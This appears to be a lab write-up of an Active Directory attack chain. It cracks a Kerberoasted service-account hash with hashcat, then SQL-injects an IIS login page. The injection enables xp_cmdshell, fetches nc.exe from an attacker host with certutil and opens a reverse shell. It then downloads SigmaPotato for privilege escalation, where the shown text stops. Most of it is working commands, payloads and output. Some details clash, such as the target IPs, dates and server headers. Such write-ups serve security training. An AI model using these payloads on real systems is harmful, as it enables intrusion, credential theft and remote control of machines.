$krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*$e5bc8efac93e25d95774768cc0205fad$d5a45703e272ace010bc318ee6105be728adf86b2245ef21020172a8d254f226921a6df938e9ed3592c148408f27e7f806874494922c26399e14abe060b1678203992bc67abfab5186bd639256bcd703b233abab8f43a90df20a0a965c497f10a51e0ea5d3e0617d79b83e3347f9d53aca56cee8f260bae936d8df9302b51be5e82d0385504cd025f213b2befd54d805e73559ca27cc7eb405845fcb911f9efec8c09a1d72663e5385e09f4bc5af67efcf568aff5580f71660ac3cfe4ee0fd8381777c83900838a8dbf48ca649302aae3098f5349859bf4c6e7b12eaf78824d5fa7620a9bedb3d4eccd8b9e152c18b123c38fae001669dfb7f7face1e782e3e2c19d4e750f37584598f803aec470954d691d5e02664812a9ec3b1613d830a49fff5786eb9ca4109cf1e63832f1d846d359a31f3771a7672e8703da296414ccbc84dcfb2b57ce8e062554dbb5c657137c10faabbe57db1ef944f4cd5b00bb7fcdf5925b4e5e4812268121cdcd2cd53da578bec0eb1e82e1bc2e25b08542f086f937d20778942942d6f54964c759a38b675a8d2b50aa36c4d3b976c005452e536d4c67fc6f4aa79ac138b477de7361e6c3b974f1ed5a31a9e4409ee3157d667d9e0286f17e40efdff4be7d31c98f43e1315d24bdb31e5c1d9fa5f5638e94b52a4c76d0dce5f3fdf9cc0a893605e0f8adf1c774ade0060c4a10e60db2a0ab0587e898b9026d01dfeb2e23e7e4679d38f0dfd97abed82ed1f6ec413266b58cf58026dddeec224a38f8de9ea0ce1505ea75808958e4748a7591b1845e860b832ec56677c76242296e0dc943061f28ffab30ed8fe231ce19cee188c65b48d7b59dc379878984443c1c663f3297601deaea805889e8a6c084ca4755139693a7ffca8dedb881380df6da5e770362dcefca16d993b9e049cbb38dbdb9ab34621d15616c0f3cd1d76f7b2bcdb4b23749428c73aa15713ed24fb38c3f8fd1c22101f154c5e799fafbf840ab09ff81502b2184c6a63be186ba63fe439cefbab09d3c3f961c8c59d4f0c164c3ac57045d7e1f03e54088b4501588e6c1716874351d931ac5f901932c4f0c979db8fa775df36c977633b5f4a5b77737ef2909ee10ea47aef6f2c9f804fec09e572ce4644a6ff52ef1542d4f87a29243937ef6da241237e79b4ae3ec4fc017999eb112b5c498385d001533bf4fc8db8163d9ad7bed7aa67d1da9a6b860432442a982ea16afa48ae67ff7567bffded92bd9d0be843b8dbaae1b4cd3f7ccc78becc030139e27ccf94f7b97161a727cc8a5db6487621d9decd91ab02b907cefbfedafcd301010db626e4c6913ae1915b81b49dceda9fc22de4c3f8c9c389a4ff3e4c07b26ca7e3ba64d3e01cc1119a911ed6e66d66de0f522:daisy_3
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*...e0f522
Time.Started.....: Fri Feb 7 00:33:50 2025 (0 secs)
Time.Estimated...: Fri Feb 7 00:33:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1977.2 kH/s (0.59ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 978944/14344390 (6.82%)
Rejected.........: 0/978944 (0.00%)
Restore.Point....: 976896/14344390 (6.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: dak123 -> curameng
Hardware.Mon.#1..: Util: 57%
Started: Fri Feb 7 00:33:49 2025
Stopped: Fri Feb 7 00:33:52 2025
1. Purged Aaron’s Cached Kerberos Ticket
┌──(kali㉿kali)-[~]
└─$ kdestroy 2. Used the iis_service cracked password to request a Kerberos Ticket Granting Ticket (TGT)
┌──(kali㉿kali)-[~]
└─$ kinit iis_service
Password for iis_service@AD.LAB: daisy_33. Verified the Kerberos Ticket was Cached
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:iis_service.ccache
Default principal: iis_service@AD.LAB
Valid starting Expires Service principal
02/07/2025 02:25:53 02/07/2025 12:25:53 krbtgt/AD.LAB@AD.LAB
renew until 02/08/2025 02:25:504. Retrieved the Login Page Using Kerberos Negotiate Authentication
┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : http://web02.ad.lab/login.asp
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.40
* Trying 10.10.14.40:80...
* Connected to web02.ad.lab (10.10.14.40) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
* GET /login.asp HTTP/1.1
* Host: web02.ad.lab
* Authorization: Negotiate YIIFpQYGKwYBBQUCoIIFmTCCBZWgDTALBgkqhkiG9xIBAgKiggWCBIIFfmCCBXoGCSqGSIb3EgECAgEAboIFaTCCBWWgAwIBBaEDAgEOogcDBQAgAAAAo4IEfGGCBHgwggR0oAMCAQWhCBsGQUQuTEFCoh8wHaADAgEDoRYwFBsESFRUUBsMd2ViMDIuYWQubGFio4IEQDCCBDygAwIBF6EDAgECooIELgSCBCo0cDGPsPNl//1n/7of0k0em+/pyUd2cDNofF1Kl3wsMK+5rB4CjTAUSdHMb2f7LkJWAPcTA8YR3QR2g8Uk8VhejbL2sQ68RG6sCELr+P72MNSOcAGVGBtgC6SwhR1iWDMzdoiaBArLoz0431HuNp93buZLSXi6SqK6CBUZEwFG7xshlShQ7HPbsairDfQeUQ+Qck1NIlZuRzDeyneWu0/ecAuwebWSGDZh8sCLD4/XnhFHOKWIUDPmTOp8SQxnWvFBBpgHHyejVvO+c2kHTHBdtKw4g9zEhiCMSUHZF7rNCY5U3NwMUcbJ0wqxhiMXm2ECWrz/OuqioDy7WAP5sBoPBAZTg0S7pjZ12XEjnUfnNtPscHQROxkR/Uo/R738iT9pxsdo/wuPF/xJG7uN7ive0FI/nBqI46RghS1W7DDvpFA+gG5GBrrrdDtKGqY55HFUsm79/CvkL3H/9HvD4cJpi+uI/mglfdkNCilA6A/A3LZrnD6j882NcWsMG2PGeY7uekTvFP2xPKsj1ogsqigaXR+SmM/diwaIXuIG8ZFsY17Ch0t9ijdRaaozo4rAchF3XD+ZjxibgpeMlC0XJhefhPRTnomAOC/rCDp+RIxCXScPJE6YPQl5sTKm6gB4P1j7KuiziCLhI1KPcWlCDAtZOk2pZtxeoZ4RLZBPCEu/9WQqBi//upucIRVFzC6HDqx+SmjFqs66+V3AihGKBzfvlBdpbkP2tBTx2vJFnjX0eWlyFdpZOgxN5+L3Xv3dSqTr3Q5ey/TVFsGoQ9oR0gD9UWzreFK1AjyhRjr+OrV0CQg2B+L4HpsGHMQDTo1ZbGlGikbsTwg+ivSsjIlynbub6d5Mo9ahG15XVMvz41qfoBfedxs82VHHKyM2JFyNRZQwNhlQ9I0htqYlZEwGLFAK6z7Z0ByOG5CbvsLeVJ3MRvQtlsQw54cuGvTsGodqt72jqslCQYjkeqJ36Qa1OHjXbWzE69FX49e38Zw3ZPzGachPd5zy5MQVIALcOfnHo2qBEAQkt1Kwu0idPV+II04RV4TwVEbjUq1HyXuZjeMKP3CgFd18ypfiXh6LCW4tahGnex2kfZ2LxTkk6g/3WKin1fqnJKDh+Ds8JFAqXb58o8KEIXQpO6X7MJLZgU7eSJkyE0Tu5xlp5TjbLi80I/n9h1cYc/gd7gqthSabSS/OJMfG522lWdd7m8/GoTXKYni5CMo9BwkJDeq047JCPzqMIkMlsqYmw6Oz0cmzsUA3tR4PWkfuxS95UpZiMq+t1EZpQ2hDy1dyVpLKUnp7yLL2jv3bvv+zKgyvEcLIJdSdQFFXiUu762NjGbKJfkoHjQSeyi9uH8ydf0NivfzjllXayZbinsy0DHdeogBIgk4fg5N25r6c4OuH5bOZBN6ga3Jud/xt7udBTFFJpIHPMIHMoAMCARKigcQEgcENtxt79ZhFIefLxdYrYCSBN1GPyvTf3cuP955i+leRmlG5fnU/dtizTR6dZ90LJ56GAuxFy3Yg2Htmej9yvYsH6N82pkOY2NS7NzBWEJmGO2eOiinjhYee6QFomjEFnswAtLw/eQZTFle/BIlw5WB6K+EclVYyooktUXq6qVBXAko1lc0jabzDc8E7XPiqbiHbv5P8pjwCbwnlkCxLvzFL3VhrCYEm8eOb0PkSsMdBLo3Hddd1JTyHb6iap6r22MZ3
* User-Agent: curl/8.11.1
* Accept: */*
* Request completely sent off
* HTTP/1.1 200 OK
* Cache-Control: private
* Content-Type: text/html
* Server: Microsoft-IIS/10.0
* Set-Cookie: ASPSESSIONIDCQBCQSRT=IEKFKHNCNLEDPDGGFEBBFGGC; path=/
* WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvAZQ3tNCcC0VI0DR3PpK0yC84in2gSEVE8zQuK2/4s4AoF25Ju0CjMnd2je2rGOFKcVuUv5i6XMDsbN+mQI8avdCRswCFLY4crErWyBjiwCQNaqyCTc9aPqEUcZyvNIUXhYJE2SbgH+kYMOhempJx
* Negotiate: noauthpersist -> 0, header part: true
* Persistent-Auth: true
* Date: Fri, 07 Feb 2025 07:20:11 GMT
* Content-Length: 346
* html
* head
* title: Very Insecure Login Form
* /title
* /head
* body
* Very Insecure Login Form
* form method=POST
* action=login.asp
* Username: <input type="text" name="username"><br/>
* Password: <input type="password" name="password"><br/>
* input type=submit
* value=Login
* /form
* /body
*/html
* Connection #0 to host web02.ad.lab left intact
5. Attempted a Normal Login to the Webpage via POST
┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : -X POST -d "username=yourUsername&password=yourPassword" http://web02.ad.lab/login.asp
Note: Unnecessary use of -X or --request, POST is already inferred.
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.40
* Trying 10.10.14.40:80...
* Connected to web02.ad.lab (10.10.14.40) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
* POST /login.asp HTTP/1.1
* Host: web02.ad.lab
* Authorization: Negotiate YIIFpQYGKwYBBQUCoIIFmTCCBZWgDTALBgkqhkiG9xIBAgKiggWCBIIFfmCCBXoGCSqGSIb3EgECAgEAboIFaTCCBWWgAwIBBaEDAgEOogcDBQAgAAAAo4IEfGGCBHgwggR0oAMCAQWhCBsGQUQuTEFCoh8wHaADAgEDoRYwFBsESFRUUBsMd2ViMDIuYWQubGFio4IEQDCCBDygAwIBF6EDAgECooIELgSCBCprRQ5eTitC641J/5Mq1XjVeyO6lGFrz3bFKBp1lwle85xzn3U6e3O+r+MkkDSrHF4PMWI4Hnqyhf4zTuGEUCECqXvWF+b7DBAMM7gm51psjXL4UocMsgrbkZzRP3Lezy28q+v1rs7nuyvQcvLlMVuFJ5+cqEjcFUVlIVbmG6X/drC1Zwq48PwKNjR6cRlSU0AZ3auPmZRwsx2UEoEaYaKe+JyYwAJsJ32kYQTfPVT8sSTv6yZ18Rg7jTYtncmyh6gxjzqOvxETBQxQiID+YToSlQ9Zeqh3q/uNpdGzTY3vJAFdFMsdLb3w8jsBUJ4JtxwnF3cOL8yGbThMv7puDCnituas6WRNy0RZ/QMVLykj76Txm93I5sOpOef6unIPcjpbkYEL/1N3t/9htuC6GwFk2RbjkDAN5c2DiAjuqkPHIEmZTFt9cUNj1pEXS0QEbdtSvr8EZaHwD7ZOkEeMYTn1cWZzqKxIxNObOXTBv83xB7AgR/pF2cPe5Iu95IS7124cKkkmJhIrLZiQ/mjk0l9PWIWqGf8OO85l8zkY0eOPE7wf7Bv+q0LTib0DQ81wLYZGKtVZN+gjqINPP6NQ1mG3Ozmkex9HzpPvV3Lur2+2bNHgZSu1WCDilDrJ3QwTMNAd8llvBXAYARyp5kqr0w+WMpkevM6EBexSsB5cEd5OsiXkatPfSBKH8C/m4Zwm1e8BEP0r4y2L8R9jMC7wFaoOr8YtqEcpHRQ/c6b3rkXvexhmBi+SMhAqrtA2GWx462Ib4nImkCJeel6s9Nmfw0itK4DDqEluJZI173YCmyrOfCbwWxHR6azyG2/3O4seyNTcWHxg0XEIB8Fb5RQcT6Ps3N5GU03JBXBQGTh0lC/SkJcRsVZZUAFrnAif3S/G8rKkhwBxPBiXt1vmMRwUtuddAer/bXHr4KR7K07fbJkPRIgLKmX2obO+4asRerPePGpTXbNAlK5R74LmfrPe0XkPrbOM6swWYjelDGmz15IgokQHaeWTK/OKZwJbPyvHr4Sbpx+F9EQZcTaedoZWXPzfMh58sF46UNoLIvoWiF8aFQDcc80eXatk97iIB+QPaNfEuxMZX4WUfh/o7zQdEKw150Oe1ODCVDTcSZw3yYeqCTrsHq1r9tuYAQTFAhqTBdukAWaUB9/i6txDZyybQ3jABTC245Ks/RlrvWm9+/p60i10r17GZHC9Csiq5L0IpY0JzyrZCxpFn8oKDRNjKbwsKY5nVWFBIj0hDt9qt0DF8yuSNRuJxn0lVu4TxU8cAmCkDH7Fdf0qs9gJJ9juYqqwqf8ADFjiEYMbMsHFBOse4mO0zNBCxNHaArMydt0U4T7peIRZwg6K0Abq83BTVbi9TsOsKnUqlDEMqS731TTURN+8m3Iov8UfNFVAoXhygQmoqiEHcJEShMTfpIHPMIHMoAMCARKigcQEgcF6VpdYes4teqMy0+q9iVa9kU7GNNUIobQjQBPnhes2cCEsfuUasFlr1hEN/Ow9IqQBG/5olgC49ZrVRPgJwuDX7rdVBCTdDpUiCnN878T7xmSw19RmtUgW5NTGQz8gW21VVbzL1Tuq22KdVOhk/r6fn9k2FztCxPpw97We3IuQmvfuEucDllIhXC4hpzFZ6gFauROv4jp13VhEdC6ID6jp4dAy9xNgPs4VjjzN51w2BFvB57fFHVsTi00NBJPbqzVd
* User-Agent: curl/8.11.1
* Accept: */*
* Content-Length: 44
* Content-Type: application/x-www-form-urlencoded
* upload completely sent off: 44 bytes
* HTTP/1.1 200 OK
* Cache-Control: private
* Content-Type: text/html
* Server: Microsoft-IIS/10.0
* Set-Cookie: ASPSESSIONIDCQBCQSRT=JEKFKHNCPFFODGCCEJINLKHK; path=/
* WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvesiYkl5bVECbTI4/U8F8QbdPPv7s3TtAK4up+QCpLUPc8Ws5EUs4sM3M6yDC7wLYIW+zhrL9ZXGjbh2YXuplDoH+rs9ZWV/i1qSXAnF6hAJRTTyILvgC1LiaKxXkWEa2qkKOrONQrugU3J+rmI9k
* Negotiate: noauthpersist - 0, header part: true
* Persistent-Auth: true
* Date: Fri, 07 Feb 2025 07:31:47 GMT
* Content-Length: 368
*
* Login failed.
* html
* head
* title Very Insecure Login Form
* /title
* /head>
* body>
* Very Insecure Login Form
* form method=POST; action=login.asp
Username: * input type=text; name=username
Password: * input type=password; name=password
type= submit; value=Login
/form
/body
/html
* Connection #0 to host web02.ad.lab left intact
6. Attempted to Login with Malformed Username Input (testing SQL injection syntax)
┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : -X POST -d "username='yourUsername&password=yourPassword" http://web02.ad.lab/login.asp
Note: Unnecessary use of -X or --request, POST is already inferred.
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.20
* Trying 10.10.14.20:80...
* Connected to web02.ad.lab (10.10.14.20) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
* POST /login.asp HTTP/1.1
* Host: web02.ad.lab
* Authorization: Negotiate YIIFIgYGKwYBBQUCoIIFFjCCBRKgDTALBgkqhkiG9xIBAgKiggT/BIIE+2CCBPcGCSqGSIb3EgECAgEAboIE5jCCBOKgAwIBBaEDAgEOogcDBQAgAAAAo4ID3GGCA9gwggPUoAMCAQWhCBsGQUQuTEFCoh8wHaADAgEBoRYwFBsESFRUUBsMd2ViMDIuYWQubGFio4IDoDCCA5ygAwIBF6EDAgEDooIDjgSCA4pfHHncA+Gpq9ue7sSeTUPm9xWZzKECQNDdPjCBIpBP7ti8L82qUmIhXm7VucJFgwvNs1KOUb09IIsyarUrboZHZfp0EFaBXZMQ0ep/lKl3Gpb+YGaHm0+Th+dOW8PvKbnt6LrMt6Nem25TM9LwYs8FTwrPoBnz8awRx7zd3T8faSnmGxX7B3fylfdpGgiWK6faeV9V/5JUTCDU3Uk8F/qhYzDYPZEhRqXtjsQ9NfiBJLAGcvIX955LuBlVc4Hg6PsRjVkPvM6+vvFfol1f45e+l5+rBpJ+FCUrhfzVTyc9N86Yk9x/GFBWPAAMvsrXohVxVabA9khglU49lQA0FPifmeDKtgLwySi8zXfWF7l+de3erJoKZvuOvv0s1BXd9mek0uDNI9oOfk2T/DWZyR07Ty/N37h4YPcTif5cR3nL5kYWfQu+G7Z7rN+FqPrLcooK0p47XcYcjp1MK/IsCt1owlpYALNI+IvURUpN6a35itoxkUOsf0N/aBS/awhJN3Pf8AQFM7AfVe9o4ZsIiA74phblLQUYIsl5qEn1JGI9bhMQD4FmEBRR6ho3WSyFYSRZg1rQmZbLJPXcfQ1oLbCpjjZqNF6OZnbEfKxGdxdzXHwMgNRi30dDUvZJY+QAOWy0OT9h0UudgpzKKnmQZyLhfCaX/0XYQuUsBAX3w00a4VggfFT20IukiWNhn6fBKJ3oo/IlE4m7S3pIqz/er6Yi6ZMooosagAk2IQd4joC0OG4dk8ClAvezPjpj5H4/Xh0h7r3OAlkIB04KE1Ii2UhF2ANkaZXYx3yOeh62eZy2BFvWrwZWHlZpOUbEq4cqA2wP9kPs0D533JSvA9Y2+nD8JAKIG52pB06IVd+Iql5xDuya9IKUWVaI1kdjIlu0JN4aHiF3PPJNAMKJREr6yQzKpAO1tk0PAyJzH0pb/McqdVW/AVe/rrGXZ9jlHQTiJ8yYyrwD2dm3Y5B2i1uk0i3kD6vT2GYP7B5suuwvqJQsE/dMOhxOx0MJol6nFfT7xU9rHoRak8t7XlSOodZCVOldYEfp8RRUX5/OtVEWwy4yuav5xrrhlTEHSLgxY5k05X25CV7BTEWouqBWigE0Ky87bowXZOVJGmHSM7t3iQaoCnLMmDviwPwmnwSnBRSolFAsawD4pJc3DrLUBW9Q4GNlFiAa4Y7b7e60sIfR/rcYS+dbCOGqKhYvAiCkgewwgemgAwIBF6KB4QSB3lv8d9cekhZjxWadU2CKt0ff+lX+UBLcxo5g0xou5336DcptMF8S0YsVAyreErVJllduKh81w0NncJqlBy4QUasixiaBIxK4UEq1MaJi8/j9Dq8F3jA4SghAtvp8EXJaXqo91lOeQ9PB38qk5SCdwlHrlu7QcNlXbNFUz0xCiaDBzxhCSV+pWDEULEvu1am57rAZdxeT/Fkom7ryhdb2X9oHGSzAHp8Gotgx249fAzurhMtQa1NAgB8zOx/qENFbEUA3YzLYYWqh51nianAdpl+tsu4j6xKRBH2SKjMXHA==
* User-Agent: curl/8.11.1
* Accept: */*
* Content-Length: 44
* Content-Type: application/x-www-form-urlencoded
* upload completely sent off: 44 bytes
* HTTP/1.1 200 OK
* Server: BaseHTTP/0.6 Python/3.13.1
* Date: Mon, 13 Jan 2025 23:39:48 GMT
* Content-Type: text/html
* Set-Cookie: ASPSESSIONIDAACBCTAB=ONNNCBNCBMDDIBGNDAJLDLLP; path=/
* Content-Length: 59
* Connection: close
* shutting down connection #0
Query Error: Incorrect syntax near 'yourUsername'.
7. Create a Script to Generate an Encoded SQLi Injection
┌──(kali㉿kali)-[~]
└─$ vim url-encode-sqli.py
#!/usr/bin/env python3
import urllib.parse
import re
# The original unencoded payload (after "username=")
payload = (
"';EXEC sp_configure 'show advanced options',1;RECONFIGURE;"
"EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;"
"EXEC xp_cmdshell \"certutil -urlcache -f http://10.10.14.10:8000/nc.exe c:/users/public/nc.exe\";"
"EXEC xp_cmdshell \"c:/users/public/nc.exe 10.10.14.10 80 -e cmd.exe\";--"
)
# Step 1: URL-encode everything (except '/' remains unencoded).
# We do not add ':' to the safe characters, so colons will be encoded by default.
encoded_payload = urllib.parse.quote(payload, safe="/")
# At this point, both colons (in "http:" and in "10.10.14.10:8000", as well as "c:" occurrences)
# have been encoded. The expected output should encode the colon after "http" but leave the colon
# between the IP address and port unencoded.
#
# We use a regex to find an IP address pattern followed by an encoded colon (%3A) and a port,
# then replace that encoded colon with a literal colon.
encoded_payload = re.sub(r'(\d+(?:\.\d+){3})%3A(\d+)', r'\1:\2', encoded_payload)
# Prepend the constant part.
final_output = "username=" + encoded_payload
print(final_output)
8. Ran the Script to Generate the Encoded SQLi Payload
┌──(kali㉿kali)-[~]
└─$ python3 url-encode-sqli.py
username=%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C1%3BRECONFIGURE%3BEXEC%20sp_configure%20%27xp_cmdshell%27%2C1%3BRECONFIGURE%3BEXEC%20xp_cmdshell%20%22certutil%20-urlcache%20-f%20http%3A//10.10.14.10:8000/nc.exe%20c%3A/users/public/nc.exe%22%3BEXEC%20xp_cmdshell%20%22c%3A/users/public/nc.exe%2010.10.14.10%2080%20-e%20cmd.exe%22%3B--
9. Saved the SQL Injection Payload to a File
┌──(kali㉿kali)-[~]
└─$ echo "username=%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C1%3BRECONFIGURE%3BEXEC%20sp_configure%20%27xp_cmdshell%27%2C1%3BRECONFIGURE%3BEXEC%20xp_cmdshell%20%22certutil%20-urlcache%20-f%20http%3A//10.10.14.10:8000/nc.exe%20c%3A/users/public/nc.exe%22%3BEXEC%20xp_cmdshell%20%22c%3A/users/public/nc.exe%2010.10.14.10%2080%20-e%20cmd.exe%22%3B--" > payload.txt
10. Copied nc.exe to the current working directory
┌──(kali㉿kali)-[~]
└─$ find / -name nc.exe -type f 2>/dev/null
/usr/share/windows-resources/binaries/nc.exe
┌──(kali㉿kali)-[~]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
11. Confirmed the Python3 HTTP Server is still Running
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
12. Sent the SQLi Payload via HTTP POST to Trigger a Reverse Shell
┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : --data-binary @payload.txt http://web02.ad.lab/login.asp
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.40
* Trying 10.10.14.40:80...
* Connected to web02.ad.lab (10.10.14.40) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
> POST /login.asp HTTP/1.1
> Host: web02.ad.lab
> Authorization: Negotiate YIIFnQYGKwYBBQUCoIIFkTCCBY2gDTALBgkqhkiG9xIBAgKiggV6BIIFdmCCBXIGCSqGSIb3EgECAgEAboIFYTCCBV2gAwIBBaEDAgEOogcDBQAgAAAAo4IEdGGCBHAwggRsoAMCAQWhCBsGQUQuTEFCoh8wHaADAgEDoRYwFBsESFRUUBsMd2ViMDIuYWQubGFio4IEODCCBDSgAwIBF6EDAgECooIEJgSCBCL9JNoE+xIJmi2KWFY+8yMr2AMd5rIScTXW0kIzeBxrP94GGU1vXTmoLOJrroiUxfxB8Dnzmq+o2xnvMmRo2HGd28u585xWystyTbLj7obokpEheEZZZK2eh7Pcz88O1iZVJZKvA8LJxUNqnwDrXnk44QTG5mW4YwlUuZlAaBAawtmx7e/xwg5Dq/jpc3XJxJ2lsY6XmCYNHYXWenWqZxylwzWM5X0o8NvjlNjSt9ZIQ7XqauEIQsrSMCtZJ5vONgIZEwwA/cxWaN/AW5rE1SH2nOjm7pFl0En1rTdd66T04pqOBy3LF2zctK/s08X7ttoJ610FGF6ZFFQHreOkBsvKf7KHorRk0ihHmI9N73cwq7t6IHMNip8HmVbeY6m5TcJl2LTC3NoDoh3NDiKuxNAWZU+Ijpa11LWavSpBhmCtNWnFzdmiktLzv4CudmLCrVFhoH1rx2nYGvANP3x4j8ZNAJ/aqMM4bQL8oyajOadX5/J2Yrz9zPK43Edf52BJLmMZz9Qy7NeaIknaKo6PlOiStZyUq3ma4AO57j/21WcjsKsWlt7rup3sSs4Ifq57UFnEExxA5o46uwr9j+okAFp18+f43SBPtqFnVNStEAMd9PQ5uOPQCMBA+6GWMGuPBYBstfn8k8Ns2zMy7WZygepZCs8N2lCn681fXstmbgkmQd+VGZVRNQTpYI/hYNPGtdmzX9S9cwepZwpAvKdNdJgOdJpNheDOvegwQLpxLLKWRC1dzysjE2kyZ7jR0Iw98OenbzlL7SRoe5WpURx/F44zp+yEwnbXG7PZErpUZt6aXs7XkVHgbD5dPQZFwonh1wUiFh/5RtblJ8HFVKr5rxq/U3Wm51+ti+G1GKjPsnTW9O2Png1AFn30RlZuxqlEaQUQkwxTTFPpjMjn5CG1UVSvD7yt+5eJOyoXQSlbOY1ML+ky/VP7EgutM8E//ZTaPt+VotObIzHCaDO3YbHWgtfJXbbAK8A92r9gaIwy79mS4d+RbDm2Jf/kPZ8t8UX1B92ReU3ai5E7bvS3l090Dk85hXHy3UUP7PzvzprwL65quiUFoNPbfubFD5i3m2U+bGT+B+AGj6kVMYyWcKCT8R6sGzo6u6UW2HZFjj6sQ1f+AVi4C1dNpxUFmzhAE3pDyXHg5LKDJ+sIWrJJi4kBF7Ry8izUx2Vh7vIskVbkkQQxWrNwHylngQUh9i0gdi0Nq91Skf+LY2NBwCAlTXixV/Y+6cdshR+HVs25usdF41s+q1y9Znh2yiCuG0pAo/jaXWzk4i7l22InYrkYFIOe595pwiJFhfXPU+B+szGEOCcmTccQyZnZE8n7sietMFrYkJyTcF9iyPzYI67stYWFHvAy5W5AbYSfpAxsjn1jcPmsoxwmrXTKp95wtmecuIS2+7JUfqSBzzCBzKADAgESooHEBIHBLm86qjUYKAbjZLP9ibc07UMvCfvjxGgI98Lkrvncb4h4cS36D/3HMAfxShC/JwCrZwHYT07a88hIHiEdwpTD3WAkVSxqUkv/5p6ZNqDJOV+ZApVzD9OC+f/Mw9/Sx+Q+IqMDLUOt6Vue7OSZioe5zOji8NWAcjEdOeoaErlr7HhFIffbQ0kM2YAW4syKD+FSPfmeRBeHGTHG/E8SKW2DnQ1/ONrXUCr3qgqq6nsBjHqYk5l+7GPkAUzyrfluiwQ5Kw==
> User-Agent: curl/8.11.1
> Accept: */*
> Content-Length: 357
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 357 bytes
13. Spawned a Reverse Shell on WEB02 as nt service\mssqlserver
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.40] 49882
Microsoft Windows [Version 10.0.26100.3037]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt service\mssqlserver
14. Listed Group Memberships and Privileges
C:\Windows\System32> whoami /groups
whoami /groups GROUP INFORMATION -----------------
Group Name Type SID Attributes
==================================== ================ ============ ================================================== Mandatory Label\High Mandatory Level Label S-1-16-12288 Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT SERVICE\ALL SERVICES Well-known group S-1-5-80-0 Mandatory group, Enabled by default, Enabled group
C:\Windows\System32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
15. Abused SeImpersonatePrivilege to Elevate Privileges to SYSTEM and used NC to Spawn an Interactive Shell
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
--2024-10-23 22:25:11-- https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
Resolving github.com (github.com)... 140.82.112.3
Connecting to github.com (github.com)|140.82.112.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/689169533/c2dab604-b778-49ae-9142-ea2e38b12908?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T022513Z&X-Amz-Expires=300&X-Amz-Signature=6ee7952c67be58f0adee183ac704344fbb9c46bd11783f13d134fc2c67e3f866&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSigmaPotato.exe&response-content-type=application%2Foctet-stream [following]
